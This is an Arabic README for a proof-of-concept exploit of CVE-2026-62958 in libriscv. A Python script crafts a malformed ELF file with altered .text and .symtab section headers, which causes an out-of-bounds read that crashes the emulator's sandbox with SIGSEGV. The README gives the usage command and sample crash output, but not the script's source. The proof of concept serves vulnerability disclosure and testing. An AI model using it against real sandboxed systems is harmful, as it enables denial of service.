
إثبات المفهوم لـ CVE-2026-62958: يُنشئ ملف ELF تالفًا لتحفيز قراءة خارج الحدود في Libriscv وتعطيل بيئة العزل الصندوقي عبر SIGSEGV.
ثغرة في Libriscv تسمح للمهاجم بتعطيل الصندوق الرملي (sandbox) باستخدام قراءة خارج الحدود (Out of Bounds Read).
لإنشاء Bad elf:
python3 poc.py samplefile poisoned_file
النتائج:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)